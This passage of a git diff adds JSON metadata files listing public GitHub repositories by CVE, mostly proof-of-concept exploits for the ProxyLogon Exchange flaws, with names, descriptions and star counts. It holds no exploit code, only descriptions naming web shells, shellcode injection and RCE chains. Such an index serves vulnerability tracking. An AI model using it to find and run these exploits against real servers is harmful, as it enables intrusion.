+ "login": "p0wershe11",
+ "id": 80803923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80803923?v=4",
+ "html_url": "https:\/\/github.com\/p0wershe11"
+ },
+ "html_url": "https:\/\/github.com\/p0wershe11\/ProxyLogon",
+ "description": "ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)",
+ "fork": false,
+ "created_at": "2021-03-17T03:56:54Z",
+ "updated_at": "2024-03-01T23:02:55Z",
+ "pushed_at": "2021-03-17T05:06:18Z",
+ "stargazers_count": 120,
+ "watchers_count": 120,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cve-2021-26855",
+ "cve-2021-26855-ssrf",
+ "cve-2021-27065",
+ "exploit",
+ "microsoft-exchange",
+ "microsoft-exchange-proxylogon",
+ "microsoft-exchange-server",
+ "proxylogon",
+ "zeroday"
+ ],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 120,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 349035798,
+ "name": "CVE-2021-26855-exploit-Exchange",
+ "full_name": "shacojx\/CVE-2021-26855-exploit-Exchange",
+ "owner": {
+ "login": "shacojx",
+ "id": 19655109,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19655109?v=4",
+ "html_url": "https:\/\/github.com\/shacojx"
+ },
+ "html_url": "https:\/\/github.com\/shacojx\/CVE-2021-26855-exploit-Exchange",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-18T10:45:54Z",
+ "updated_at": "2023-06-13T00:44:08Z",
+ "pushed_at": "2021-04-05T02:36:51Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 349915444,
+ "name": "CVE-2021-26855-Exchange-RCE",
+ "full_name": "catmandx\/CVE-2021-26855-Exchange-RCE",
+ "owner": {
+ "login": "catmandx",
+ "id": 50922013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50922013?v=4",
+ "html_url": "https:\/\/github.com\/catmandx"
+ },
+ "html_url": "https:\/\/github.com\/catmandx\/CVE-2021-26855-Exchange-RCE",
+ "description": "Microsoft Exchange Proxylogon Exploit Chain EXP分析",
+ "fork": false,
+ "created_at": "2021-03-21T06:16:24Z",
+ "updated_at": "2021-03-21T06:16:24Z",
+ "pushed_at": "2021-03-18T00:55:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 350620709,
+ "name": "CVE-2021-26855-CVE-2021-27065",
+ "full_name": "hictf\/CVE-2021-26855-CVE-2021-27065",
+ "owner": {
+ "login": "hictf",
+ "id": 43127173,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43127173?v=4",
+ "html_url": "https:\/\/github.com\/hictf"
+ },
+ "html_url": "https:\/\/github.com\/hictf\/CVE-2021-26855-CVE-2021-27065",
+ "description": "analytics ProxyLogo Mail exchange RCE",
+ "fork": false,
+ "created_at": "2021-03-23T07:37:47Z",
+ "updated_at": "2021-03-23T19:02:32Z",
+ "pushed_at": "2021-03-23T19:02:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 350906098,
+ "name": "proxylogon-exploit",
+ "full_name": "praetorian-inc\/proxylogon-exploit",
+ "owner": {
+ "login": "praetorian-inc",
+ "id": 8173787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8173787?v=4",
+ "html_url": "https:\/\/github.com\/praetorian-inc"
+ },
+ "html_url": "https:\/\/github.com\/praetorian-inc\/proxylogon-exploit",
+ "description": "Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.",
+ "fork": false,
+ "created_at": "2021-03-24T01:12:48Z",
+ "updated_at": "2024-04-15T17:24:35Z",
+ "pushed_at": "2021-03-24T01:25:05Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 18
+ },
+ {
+ "id": 352785704,
+ "name": "SharpProxyLogon",
+ "full_name": "Flangvik\/SharpProxyLogon",
+ "owner": {
+ "login": "Flangvik",
+ "id": 23613997,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23613997?v=4",
+ "html_url": "https:\/\/github.com\/Flangvik"
+ },
+ "html_url": "https:\/\/github.com\/Flangvik\/SharpProxyLogon",
+ "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection ",
+ "fork": false,
+ "created_at": "2021-03-29T21:10:34Z",
+ "updated_at": "2024-04-12T22:47:07Z",
+ "pushed_at": "2021-03-31T11:57:38Z",
+ "stargazers_count": 237,
+ "watchers_count": 237,
+ "has_discussions": false,
+ "forks_count": 41,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 41,
+ "watchers": 237,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 357875949,
+ "name": "ProxyVulns",
+ "full_name": "hosch3n\/ProxyVulns",
+ "owner": {
+ "login": "hosch3n",
+ "id": 29953808,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29953808?v=4",
+ "html_url": "https:\/\/github.com\/hosch3n"
+ },
+ "html_url": "https:\/\/github.com\/hosch3n\/ProxyVulns",
+ "description": "[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.",
+ "fork": false,
+ "created_at": "2021-04-14T11:12:30Z",
+ "updated_at": "2024-06-21T00:09:14Z",
+ "pushed_at": "2022-10-21T08:59:23Z",
+ "stargazers_count": 173,
+ "watchers_count": 173,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 173,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 359403469,
+ "name": "106362522",
+ "full_name": "Nick-Yin12\/106362522",
+ "owner": {
+ "login": "Nick-Yin12",
+ "id": 82452652,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82452652?v=4",
+ "html_url": "https:\/\/github.com\/Nick-Yin12"
+ },
+ "html_url": "https:\/\/github.com\/Nick-Yin12\/106362522",
+ "description": "針對近期微軟公布修補遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現安全漏洞後,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同時也將此項漏洞稱為「ProxyLogon」。 此次揭露的「ProxyLogon」漏洞,是以無需驗證即可使用的遠端程式碼執行 (Pre-Auth Remote Code Execution;Pre-Auth RCE)零日漏洞(Zero-day exploit),可讓攻擊者得以繞過身份驗證步驟,驅使系統管理員協助執行惡意文件或執行指令,進而觸發更廣泛的攻擊。 「ProxyLogon」是微軟近期被揭露最重大的RCE漏洞之一,DEVCORE團隊遵循責任揭露 (Responsible Disclosure)原則,在發現後便第一時間立即於今年1月5日通報微軟進行修補,避免該漏洞遭有心人士利用,造成全球用戶重大損失。而微軟遂於3月2日針對相關漏洞釋出安全更新,避免用戶機敏資訊遭受惡意攻擊。個人想法:微軟是大眾常用的軟體之一,駭客只要察覺漏洞就會進行惡意的攻擊,微軟公布4個Exchange Server的安全漏洞後,就遭受駭客的惡意攻擊,這件事的發生,微軟需更加小心並提高資安的防護。",
+ "fork": false,
+ "created_at": "2021-04-19T09:33:52Z",
+ "updated_at": "2021-04-19T09:35:18Z",
+ "pushed_at": "2021-04-19T09:35:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422862938,
+ "name": "Flangvik",
+ "full_name": "yaoxiaoangry3\/Flangvik",
+ "owner": {
+ "login": "yaoxiaoangry3",
+ "id": 93431453,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93431453?v=4",
+ "html_url": "https:\/\/github.com\/yaoxiaoangry3"
+ },
+ "html_url": "https:\/\/github.com\/yaoxiaoangry3\/Flangvik",
+ "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…",
+ "fork": false,
+ "created_at": "2021-10-30T11:31:48Z",
+ "updated_at": "2021-10-30T11:31:52Z",
+ "pushed_at": "2021-10-30T11:31:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435023930,
+ "name": "poc_proxylogon",
+ "full_name": "thau0x01\/poc_proxylogon",
+ "owner": {
+ "login": "thau0x01",
+ "id": 8220038,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8220038?v=4",
+ "html_url": "https:\/\/github.com\/thau0x01"
+ },
+ "html_url": "https:\/\/github.com\/thau0x01\/poc_proxylogon",
+ "description": "Microsoft Exchange ProxyLogon PoC (CVE-2021-26855)",
+ "fork": false,
+ "created_at": "2021-12-04T22:38:30Z",
+ "updated_at": "2024-02-29T20:23:44Z",
+ "pushed_at": "2022-02-10T15:20:42Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 500657432,
+ "name": "Flangvik",
+ "full_name": "1342486672\/Flangvik",
+ "owner": {
+ "login": "1342486672",
+ "id": 107014850,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107014850?v=4",
+ "html_url": "https:\/\/github.com\/1342486672"
+ },
+ "html_url": "https:\/\/github.com\/1342486672\/Flangvik",
+ "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…",
+ "fork": false,
+ "created_at": "2022-06-07T02:09:10Z",
+ "updated_at": "2022-06-07T02:09:10Z",
+ "pushed_at": "2022-06-07T02:09:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 507096297,
+ "name": "ExchangeSmash",
+ "full_name": "TheDudeD6\/ExchangeSmash",
+ "owner": {
+ "login": "TheDudeD6",
+ "id": 108148004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108148004?v=4",
+ "html_url": "https:\/\/github.com\/TheDudeD6"
+ },
+ "html_url": "https:\/\/github.com\/TheDudeD6\/ExchangeSmash",
+ "description": "CVE-2021-26855",
+ "fork": false,
+ "created_at": "2022-06-24T17:42:28Z",
+ "updated_at": "2022-06-24T17:42:46Z",
+ "pushed_at": "2022-06-24T17:42:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 507818569,
+ "name": "ProxyLogon",
+ "full_name": "kh4sh3i\/ProxyLogon",
+ "owner": {
+ "login": "kh4sh3i",
+ "id": 64693844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4",
+ "html_url": "https:\/\/github.com\/kh4sh3i"
+ },
+ "html_url": "https:\/\/github.com\/kh4sh3i\/ProxyLogon",
+ "description": "ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell)",
+ "fork": false,
+ "created_at": "2022-06-27T08:07:48Z",
+ "updated_at": "2024-04-25T19:13:50Z",
+ "pushed_at": "2023-03-28T19:07:50Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "2021-27065",
+ "cve",
+ "cve-2021-26855",
+ "exchange",
+ "exchange-server",
+ "exploit",
+ "microsoft",
+ "microsoft-exchange-proxylogon",
+ "outlook",
+ "proxylogon",
+ "zeroday"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 591884657,
+ "name": "Zirconium",
+ "full_name": "byinarie\/Zirconium",
+ "owner": {
+ "login": "byinarie",
+ "id": 20119926,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20119926?v=4",
+ "html_url": "https:\/\/github.com\/byinarie"
+ },
+ "html_url": "https:\/\/github.com\/byinarie\/Zirconium",
+ "description": "Tool to search for IOCs related to HAFNIUM: CVE-2021-26855 CVE-2021-26857 CVE-2021-26858 CVE-2021-27065",
+ "fork": false,
+ "created_at": "2023-01-22T07:59:10Z",
+ "updated_at": "2023-10-31T15:00:44Z",
+ "pushed_at": "2021-03-05T23:56:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 596567126,
+ "name": "Microsoft-Exchange-RCE",
+ "full_name": "ssrsec\/Microsoft-Exchange-RCE",
+ "owner": {
+ "login": "ssrsec",
+ "id": 48439183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48439183?v=4",
+ "html_url": "https:\/\/github.com\/ssrsec"
+ },
+ "html_url": "https:\/\/github.com\/ssrsec\/Microsoft-Exchange-RCE",
+ "description": "Microsoft Exchange CVE-2021-26855&CVE-2021-27065",
+ "fork": false,
+ "created_at": "2023-02-02T13:20:45Z",
+ "updated_at": "2023-02-03T02:40:14Z",
+ "pushed_at": "2023-02-02T13:24:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 632273646,
+ "name": "cve-2021-26855",
+ "full_name": "MacAsure\/cve-2021-26855",
+ "owner": {
+ "login": "MacAsure",
+ "id": 110767603,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110767603?v=4",
+ "html_url": "https:\/\/github.com\/MacAsure"
+ },
+ "html_url": "https:\/\/github.com\/MacAsure\/cve-2021-26855",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-25T04:29:35Z",
+ "updated_at": "2023-04-25T04:29:36Z",
+ "pushed_at": "2023-04-25T04:31:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 739156681,
+ "name": "testanull-CVE-2021-26855_read_poc.txt",
+ "full_name": "timb-machine-mirrors\/testanull-CVE-2021-26855_read_poc.txt",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/testanull-CVE-2021-26855_read_poc.txt",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2024-01-04T22:48:21Z",
+ "updated_at": "2024-01-04T22:50:51Z",
+ "pushed_at": "2024-01-04T22:48:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26856.json b/2021/CVE-2021-26856.json
new file mode 100644
index 0000000000..44e2597a15
--- /dev/null
+++ b/2021/CVE-2021-26856.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 346483081,
+ "name": "CVE-2021-26856",
+ "full_name": "avi8892\/CVE-2021-26856",
+ "owner": {
+ "login": "avi8892",
+ "id": 31028818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31028818?v=4",
+ "html_url": "https:\/\/github.com\/avi8892"
+ },
+ "html_url": "https:\/\/github.com\/avi8892\/CVE-2021-26856",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-10T20:27:27Z",
+ "updated_at": "2022-01-13T16:20:46Z",
+ "pushed_at": "2021-03-10T12:46:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26857.json b/2021/CVE-2021-26857.json
new file mode 100644
index 0000000000..9f1395bea6
--- /dev/null
+++ b/2021/CVE-2021-26857.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 346784494,
+ "name": "Proxylogon-exploit",
+ "full_name": "sirpedrotavares\/Proxylogon-exploit",
+ "owner": {
+ "login": "sirpedrotavares",
+ "id": 10796859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10796859?v=4",
+ "html_url": "https:\/\/github.com\/sirpedrotavares"
+ },
+ "html_url": "https:\/\/github.com\/sirpedrotavares\/Proxylogon-exploit",
+ "description": "proxylogon exploit - CVE-2021-26857",
+ "fork": false,
+ "created_at": "2021-03-11T17:32:32Z",
+ "updated_at": "2024-05-31T02:07:57Z",
+ "pushed_at": "2021-03-11T17:34:15Z",
+ "stargazers_count": 114,
+ "watchers_count": 114,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 114,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26868.json b/2021/CVE-2021-26868.json
new file mode 100644
index 0000000000..c6a4681ecb
--- /dev/null
+++ b/2021/CVE-2021-26868.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361973988,
+ "name": "CVE-2021-26868",
+ "full_name": "KangD1W2\/CVE-2021-26868",
+ "owner": {
+ "login": "KangD1W2",
+ "id": 39058866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39058866?v=4",
+ "html_url": "https:\/\/github.com\/KangD1W2"
+ },
+ "html_url": "https:\/\/github.com\/KangD1W2\/CVE-2021-26868",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-27T03:55:38Z",
+ "updated_at": "2024-01-17T16:03:18Z",
+ "pushed_at": "2021-04-26T14:23:48Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26871.json b/2021/CVE-2021-26871.json
new file mode 100644
index 0000000000..915cf017fb
--- /dev/null
+++ b/2021/CVE-2021-26871.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 351287174,
+ "name": "CVE-2021-26871_POC",
+ "full_name": "fr4nkxixi\/CVE-2021-26871_POC",
+ "owner": {
+ "login": "fr4nkxixi",
+ "id": 81340681,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81340681?v=4",
+ "html_url": "https:\/\/github.com\/fr4nkxixi"
+ },
+ "html_url": "https:\/\/github.com\/fr4nkxixi\/CVE-2021-26871_POC",
+ "description": "POC for CVE-2021-26871(Maybe)",
+ "fork": false,
+ "created_at": "2021-03-25T02:38:08Z",
+ "updated_at": "2024-02-10T16:51:44Z",
+ "pushed_at": "2021-03-25T03:15:17Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26882.json b/2021/CVE-2021-26882.json
new file mode 100644
index 0000000000..4706e80764
--- /dev/null
+++ b/2021/CVE-2021-26882.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 346986729,
+ "name": "CVE-2021-26882",
+ "full_name": "taiji-xo\/CVE-2021-26882",
+ "owner": {
+ "login": "taiji-xo",
+ "id": 18670013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18670013?v=4",
+ "html_url": "https:\/\/github.com\/taiji-xo"
+ },
+ "html_url": "https:\/\/github.com\/taiji-xo\/CVE-2021-26882",
+ "description": "PoC",
+ "fork": false,
+ "created_at": "2021-03-12T07:58:57Z",
+ "updated_at": "2023-05-10T08:23:12Z",
+ "pushed_at": "2021-03-11T14:01:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-268855.json b/2021/CVE-2021-268855.json
new file mode 100644
index 0000000000..82abc39621
--- /dev/null
+++ b/2021/CVE-2021-268855.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 573157644,
+ "name": "CVE-2021-268855",
+ "full_name": "sikkertech\/CVE-2021-268855",
+ "owner": {
+ "login": "sikkertech",
+ "id": 74667436,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74667436?v=4",
+ "html_url": "https:\/\/github.com\/sikkertech"
+ },
+ "html_url": "https:\/\/github.com\/sikkertech\/CVE-2021-268855",
+ "description": "Exploiting Microsoft CVE-2021-268855 in Exchange (Getting RCE)",
+ "fork": false,
+ "created_at": "2022-12-01T20:30:56Z",
+ "updated_at": "2023-01-13T18:04:46Z",
+ "pushed_at": "2022-12-01T20:39:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26903.json b/2021/CVE-2021-26903.json
new file mode 100644
index 0000000000..d9d8aa5ac3
--- /dev/null
+++ b/2021/CVE-2021-26903.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 341895421,
+ "name": "CVE-2021-26903",
+ "full_name": "Security-AVS\/CVE-2021-26903",
+ "owner": {
+ "login": "Security-AVS",
+ "id": 72926885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4",
+ "html_url": "https:\/\/github.com\/Security-AVS"
+ },
+ "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-26903",
+ "description": "ISIDA RETRIEVER v5.2\" Reflected XSS",
+ "fork": false,
+ "created_at": "2021-02-24T12:36:01Z",
+ "updated_at": "2021-02-24T12:40:09Z",
+ "pushed_at": "2021-02-24T12:40:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26904.json b/2021/CVE-2021-26904.json
new file mode 100644
index 0000000000..ff5e1beed2
--- /dev/null
+++ b/2021/CVE-2021-26904.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 341897194,
+ "name": "-CVE-2021-26904",
+ "full_name": "Security-AVS\/-CVE-2021-26904",
+ "owner": {
+ "login": "Security-AVS",
+ "id": 72926885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4",
+ "html_url": "https:\/\/github.com\/Security-AVS"
+ },
+ "html_url": "https:\/\/github.com\/Security-AVS\/-CVE-2021-26904",
+ "description": "LMA ISIDA Retriever 5.2 allows SQL Injection",
+ "fork": false,
+ "created_at": "2021-02-24T12:42:52Z",
+ "updated_at": "2021-02-24T12:43:56Z",
+ "pushed_at": "2021-02-24T12:43:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26943.json b/2021/CVE-2021-26943.json
new file mode 100644
index 0000000000..39c2de733c
--- /dev/null
+++ b/2021/CVE-2021-26943.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 325836310,
+ "name": "SmmExploit",
+ "full_name": "tandasat\/SmmExploit",
+ "owner": {
+ "login": "tandasat",
+ "id": 1620923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4",
+ "html_url": "https:\/\/github.com\/tandasat"
+ },
+ "html_url": "https:\/\/github.com\/tandasat\/SmmExploit",
+ "description": "The report and the exploit of CVE-2021-26943, the kernel-to-SMM local privilege escalation vulnerability in ASUS UX360CA BIOS version 303.",
+ "fork": false,
+ "created_at": "2020-12-31T16:30:02Z",
+ "updated_at": "2024-06-11T15:20:00Z",
+ "pushed_at": "2021-03-29T12:33:38Z",
+ "stargazers_count": 124,
+ "watchers_count": 124,
+ "has_discussions": true,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "smm",
+ "uefi",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 124,
+ "score": 0,
+ "subscribers_count": 11
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27065.json b/2021/CVE-2021-27065.json
new file mode 100644
index 0000000000..180fc08452
--- /dev/null
+++ b/2021/CVE-2021-27065.json
@@ -0,0 +1,32 @@
+[
